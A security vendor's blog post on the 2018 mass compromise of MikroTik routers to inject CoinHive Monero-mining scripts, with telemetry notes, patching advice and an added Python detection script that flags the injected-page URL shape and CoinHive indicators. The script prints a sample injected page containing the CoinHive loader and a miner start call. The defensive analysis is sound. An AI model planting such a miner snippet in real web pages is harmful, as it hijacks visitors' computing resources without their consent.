Cryptocurrency miner hits IoT devices, mostly affects Brazil and Russia!

Credit to Author: Pradeep Kulkarni| Date: Thu, 09 Aug 2018 08:46:11 +0000

According to a blogpost published on Aug 1, 2018, 200,000 routers in Brazil were compromised to deliver cryptocurrency mining scripts that mine the Monero (XMR) cryptocurrency. Hackers compromised the vulnerable MikroTik routers by injecting CoinHive scripts into the routers' web pages in order to carry out a mass cryptocurrency-mining attack.

The IDS/IPS research team at Quick Heal Security Labs was observing the attack and soon started digging into its telemetry for traces of it. The data-mining effort landed us on traces of the attack at our customers, all of which were completely blocked by Quick Heal's IDS/IPS solution. The telemetry recorded hits for the IDS/IPS signatures from July 30, 2018, to Aug 4, 2018; we did not see hits after Aug 4, 2018. We believe the infected routers were cleaned up and patched against the vulnerability that led to the attack.

Fig 1. IDS/IPS signature hits

The compromised URLs that were accessed had a typical structure like this:

http://<Router IP Address>/<Random String>.php

The sample URL set received in telemetry looks like the below.

Fig 2. Compromised URL telemetry

At the time of the analysis, the compromised pages did not deliver the cryptocurrency miner code, as most of them were down. A typical injected CoinHive JavaScript looks like the below:

Fig 3. CoinHive Injection

To know more about how CoinHive cryptocurrency mining works, read this blogpost.

The fingerprint of one of the routers is shown below; it clearly indicates that the device is a MikroTik.

Fig 4. Fingerprint of compromised IP – MikroTik device

The most affected country was Brazil, followed by Russia. We also saw countries like Vietnam, the Republic of Moldova and the United States being affected.

Fig 5. Affected Countries

This shows the intensity of the mass router compromise, which in turn would have affected many users. It also shows the importance of patching well-known vulnerabilities.
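The two observables described above (request URLs of the form http://<Router IP Address>/<Random String>.php, and response bodies carrying an injected CoinHive loader) can be turned into simple defensive checks over proxy or web-gateway logs. The following is an added example written for this page, not Quick Heal's IDS/IPS signature logic and not code from the Trustwave write-up. The random-string length and charset, the tab-separated log format, the sample IP addresses (documentation ranges) and page names are constructed assumptions; the CoinHive loader URL and the CoinHive.Anonymous() API are the library's publicly documented names rather than content taken from the figure.

```python
"""
Constructed example (not Quick Heal's code): flag CoinHive-style injection traffic.

Two checks the post describes, implemented as defensive detections:
  1. Request URLs shaped like http://<Router IP Address>/<Random String>.php
  2. Response bodies carrying the CoinHive loader script or its Anonymous() API call
"""
import re
from typing import Dict, List, Optional, Tuple

# URL shape quoted in the post. The random-string length (>= 6) and charset are assumptions.
ROUTER_PHP_URL_RE = re.compile(
    r"^https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/([A-Za-z0-9_-]{6,})\.php$"
)

# CoinHive's public loader URL and browser API (well-known names, not taken from the figure).
COINHIVE_INDICATORS = {
    "coinhive_loader": re.compile(r"coinhive\.com/lib/coinhive(?:\.min)?\.js", re.I),
    "coinhive_api": re.compile(r"\bCoinHive\.Anonymous\s*\(", re.I),
    "coinhive_start": re.compile(r"\.start\s*\(\s*\)", re.I),  # too weak on its own
}


def classify_url(url: str) -> Optional[Tuple[str, str]]:
    """Return (router_ip, page_name) if the URL matches the injected-page shape, else None."""
    m = ROUTER_PHP_URL_RE.match(url.strip())
    if not m:
        return None
    ip, name = m.group(1), m.group(2)
    # Reject out-of-range octets that the regex alone would accept (e.g. 999.1.1.1).
    if any(int(octet) > 255 for octet in ip.split(".")):
        return None
    return ip, name


def scan_html(body: str) -> List[str]:
    """Return the names of CoinHive indicators present in an HTTP response body.

    A bare '.start()' call is generic JavaScript, so it only counts when a stronger
    indicator (loader URL or CoinHive.Anonymous) is also present.
    """
    hits = [name for name, rx in COINHIVE_INDICATORS.items() if rx.search(body)]
    if hits == ["coinhive_start"]:
        return []
    return hits


def scan_proxy_log(lines: List[str]) -> List[Dict[str, str]]:
    """Scan 'client_ip<TAB>url<TAB>status' lines and report URLs with the injected-page shape.

    The log format is a constructed assumption; adapt the split to your proxy's format.
    """
    alerts: List[Dict[str, str]] = []
    for line in lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 3:
            continue  # malformed line, skip rather than crash the scan
        client, url, status = parts
        hit = classify_url(url)
        if hit:
            alerts.append({"client": client, "router_ip": hit[0], "page": hit[1], "status": status})
    return alerts


# Constructed sample data: documentation-range IPs and made-up page names.
SAMPLE_PROXY_LOG = [
    "10.0.0.5\thttp://192.0.2.10/xk3q9zjf.php\t200",
    "10.0.0.5\thttp://www.example.com/index.php\t200",
    "10.0.0.7\thttp://198.51.100.23/gt7bm2wq.php\t404",
    "10.0.0.9\thttp://192.0.2.10/logo.png\t200",
]

SAMPLE_INJECTED_HTML = """<html><body>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITEKEY-PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script>
</body></html>"""

SAMPLE_CLEAN_HTML = "<html><body><script>app.start();</script></body></html>"

if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("injected-page URL:", alert)
    print("injected body indicators:", scan_html(SAMPLE_INJECTED_HTML))
    print("clean body indicators:", scan_html(SAMPLE_CLEAN_HTML))
```

The URL check is deliberately narrow (a bare IPv4 host followed by a single random-looking PHP page) so that it flags the pattern the telemetry showed without matching every PHP site; the body check requires the loader URL or the CoinHive API call before it will report a page, because a generic .start() call appears in plenty of legitimate JavaScript.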
Updating routers and other IoT devices is a challenge, but we strongly recommend getting familiar with the upgrade process for your various IoT devices and regularly updating them with the latest patches. Even though MikroTik had issued a patch against this vulnerability in April 2018, the affected devices were not patched, which led to this massive router compromise. To defend against such attacks, it is really important to patch all sorts of devices.

Quick Heal IDS/IPS Detection

HTTP/CoinhiveMiner.UN!KP.4461 – Coinhive miner requests

Reference

https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-%E2%80%93-First-we-cryptojack-Brazil,-then-we-take-the-World-/

Subject Matter Expert

Pradeep Kulkarni | Quick Heal Security Labs

The post "Cryptocurrency miner hits IoT devices, mostly affects Brazil and Russia!" appeared first on Quick Heal Blog.